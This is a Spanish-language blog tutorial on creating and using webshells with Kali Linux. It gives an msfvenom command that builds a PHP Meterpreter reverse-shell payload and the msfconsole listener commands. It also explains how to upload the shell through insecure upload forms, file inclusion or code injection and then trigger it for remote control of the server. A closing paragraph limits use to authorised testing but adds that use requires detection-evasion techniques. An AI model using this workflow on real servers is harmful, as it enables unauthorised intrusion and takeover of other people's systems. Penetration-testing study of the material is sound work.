Hacking y Ciberseguridad con kali linux Webshells

 

www.onlinetis.com

Hacking y Ciberseguridad con kali linux Webshells

Para utilizar la herramienta Kali Webshells, primero necesitas entender qué es un webshell. Un webshell es un script malicioso que un atacante sube a un servidor web para obtener control remoto sobre él. La herramienta Kali Webshells facilita la creación y gestión de estos scripts.


Pasos para usar Kali Webshells

  1. Encontrar la herramienta: La herramienta Webshells no es un programa independiente en Kali Linux. En realidad, es una categoría de scripts y herramientas que se encuentran dentro de la distribución. No existe un comando kali-webshells como tal. Los webshells más comunes ya vienen preinstalados en Kali Linux o se pueden generar fácilmente con herramientas como Msfvenom (parte de Metasploit Framework).

  2. Generar el webshell: La forma más común de crear un webshell es usando Msfvenom. Puedes generar un webshell en diferentes lenguajes de programación, como PHP, ASP o JSP.

    • Ejemplo para PHP:

      Bash
      msfvenom -p php/meterpreter/reverse_tcp LHOST=<tu_ip> LPORT=<puerto> -f raw > shell.php
      

      Aquí, -p especifica el payload (el webshell), LHOST es la dirección IP de tu máquina Kali (donde recibirás la conexión) y LPORT es el puerto.

  3. Subir el webshell al servidor: Una vez que tienes el archivo (shell.php en este ejemplo), necesitas encontrar una vulnerabilidad en el servidor web para subirlo. Esto podría ser a través de una página de subida de archivos no segura, una vulnerabilidad de inclusión de archivos (LFI/RFI) o una inyección de código.

  4. Establecer un "listener": Antes de activar el webshell, debes configurar un programa en tu máquina Kali para que "escuche" la conexión entrante desde el servidor. Metasploit Framework es la herramienta ideal para esto.

    • Abrir msfconsole:

      Bash
      msfconsole
      
    • Configurar el listener:

      Bash
      use exploit/multi/handler
      set payload php/meterpreter/reverse_tcp
      set LHOST <tu_ip>
      set LPORT <puerto>
      exploit
      

      Asegúrate de que LHOST y LPORT coincidan con los valores que usaste al generar el webshell.

  5. Activar el webshell: Finalmente, navega a la URL del webshell que subiste en el servidor (por ejemplo, http://servidor-vulnerable.com/ruta/shell.php). Al acceder a esta URL, el webshell se ejecutará, se conectará a tu "listener" en Kali y te dará una sesión de Meterpreter para controlar remotamente el servidor.


Precauciones y consideraciones

  • Este proceso es parte de las pruebas de penetración y solo debe realizarse en sistemas para los que tienes permiso explícito.

  • El uso de webshells sin autorización es ilegal y puede tener graves consecuencias.

  • Los webshells pueden ser detectados por antivirus y sistemas de detección de intrusos (IDS/IPS), por lo que su uso requiere técnicas para evadir la detección.

Entradas populares de este blog

Ciberseguridad y hacking con Whatweb

Como robar contraseñas haciendo un phishing web

Arsenal software hacking NFC